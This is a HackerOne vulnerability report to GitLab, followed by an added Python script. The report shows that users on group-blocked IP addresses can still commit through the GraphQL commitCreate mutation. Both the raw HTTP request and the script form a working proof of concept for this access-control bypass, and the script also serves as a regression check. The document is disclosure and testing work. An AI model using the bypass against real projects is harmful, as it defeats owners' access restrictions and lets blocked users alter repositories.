Users on banned IP addresses can still commit to projects
HackerOne report #1914049 by js_noob
on 2023-03-21, assigned to GitLab Team
Report
Summary
Hello team, as part of group/project security, an owner can block certain IP addresses from accessing that group's resources (projects, ...). However, even if a user is on a blocked IP address, he can still commit to projects.
Steps to reproduce
- Create a group and a project, and add a maintainer
- From the owner, navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add the maintainer's IP address under "Restrict access by IP address"
- From the maintainer, navigate to https://gitlab.com/GRP/PROJECT/-/tree/main and verify the 404
- From the maintainer, send the following request, changing the variables according to your preferences
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: YOUR_COOKIES
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/-/graphql-explorer?_gl=1*1mb1g5a*_ga*MjM3Mzk5MDUzLjE2NzczMjcxMTY.*_ga_ENFH3X7M5Y*MTY3ODk4Mzg2Ni40LjEuMTY3ODk4MzkwNi4wLjAuMA..
Content-Type: application/json
X-Csrf-Token: xD3r11jgwirOfA6E1GB1pL9ZEuq8lqQCYcrZo4eSO8xbfvb9kmkI5BmsLqWWtgLw894u3hwjqXeGO4LbPJ_cNg
Content-Length: 489
Origin: https://gitlab.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"query":"mutation MyMutation {\n commitCreate(\n input: {\n projectPath: \"test645811/project-1\",\n branch: \"main\",\n message: \"This is a Commit\",\n actions: [\n {\n action: UPDATE,\n filePath: \"README.md\",\n content: \"This is a test content\",\n encoding: TEXT\n }\n ]\n }\n ) {\n commit {\n author {\n name\n }\n }\n }\n}\n","variables":null,"operationName":"MyMutation"}
- Verify the successful response and, from the owner, verify the creation of the commit
Video/POC
bandicam_2023-03-21_20-40-59-702.mp4
Impact
Users from banned IP addresses can manage to push changes to a project when they should be completely blocked from accessing any project that belongs to that group.
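The following script is an added example, not part of the report or of GitLab's own code. It drives the two checks the report describes from one place: a REST lookup of the project (expected to return 404 for a user on a restricted IP) followed by the same commitCreate GraphQL mutation, sent with the input as a GraphQL variable rather than inlined literals. The environment variable names (GITLAB_URL, GITLAB_TOKEN, PROJECT_PATH), the probe file content and the classification labels are assumptions made here; the script assumes a personal access token with api scope for the restricted maintainer and must be run from an IP address the group owner has listed under "Restrict access by IP address". It overwrites README.md on the target branch, so use a throwaway project.

```python
"""Check whether a group IP restriction is enforced for the commitCreate mutation.

Added example, not part of the HackerOne report or GitLab's own code. Assumes a
personal access token (api scope) for the restricted maintainer and that it is
run from an IP address the owner has blocked for the group.
"""
import json
import os
import sys
import urllib.error
import urllib.request
from urllib.parse import quote

# Same mutation the report sends, with the input passed as a variable.
COMMIT_CREATE_MUTATION = """
mutation CommitCreate($input: CommitCreateInput!) {
  commitCreate(input: $input) {
    commit { sha author { name } }
    errors
  }
}
"""


def build_commit_mutation(project_path, branch, file_path, content, message):
    """Build the JSON body for /api/graphql that updates one file on a branch."""
    return {
        "query": COMMIT_CREATE_MUTATION,
        "operationName": "CommitCreate",
        "variables": {
            "input": {
                "projectPath": project_path,
                "branch": branch,
                "message": message,
                "actions": [
                    {"action": "UPDATE", "filePath": file_path,
                     "content": content, "encoding": "TEXT"}
                ],
            }
        },
    }


def classify(rest_status, graphql_response):
    """Compare the REST view of the project with the GraphQL mutation result.

    rest_status is the HTTP status of GET /api/v4/projects/:path; the report
    expects 404 for a restricted user. graphql_response is the parsed body
    returned by /api/graphql for the mutation. Labels are this script's own.
    """
    if rest_status != 404:
        return "not-restricted"  # setup problem: REST still shows the project
    payload = (graphql_response.get("data") or {}).get("commitCreate") or {}
    if payload.get("commit"):
        return "bypass"  # commit created despite the IP restriction
    if payload.get("errors") or graphql_response.get("errors"):
        return "enforced"
    return "unknown"


def _request(url, token, body=None):
    """Send one authenticated request and return (status, parsed JSON or None)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method="POST" if data else "GET")
    req.add_header("Authorization", f"Bearer {token}")
    req.add_header("Content-Type", "application/json")
    try:
        with urllib.request.urlopen(req, timeout=30) as resp:
            return resp.status, json.loads(resp.read() or b"null")
    except urllib.error.HTTPError as err:
        try:
            return err.code, json.loads(err.read() or b"null")
        except ValueError:
            return err.code, None


def check_ip_restriction(base_url, token, project_path, branch="main",
                         file_path="README.md", content="ip-restriction probe"):
    """Run both steps from the report and return the classification."""
    rest_url = f"{base_url}/api/v4/projects/{quote(project_path, safe='')}"
    rest_status, _ = _request(rest_url, token)
    body = build_commit_mutation(project_path, branch, file_path, content,
                                 "IP restriction probe (added example)")
    _, graphql_body = _request(f"{base_url}/api/graphql", token, body)
    return classify(rest_status, graphql_body or {})


if __name__ == "__main__":
    # GITLAB_URL, GITLAB_TOKEN and PROJECT_PATH are assumed environment variables.
    result = check_ip_restriction(
        os.environ.get("GITLAB_URL", "https://gitlab.com"),
        os.environ["GITLAB_TOKEN"],
        os.environ["PROJECT_PATH"],
    )
    print(result)
    sys.exit(0 if result == "enforced" else 1)
```

The exit status makes the script usable as a regression check after a fix: it succeeds only when the REST endpoint hides the project and the mutation is rejected; a created commit is reported as a bypass.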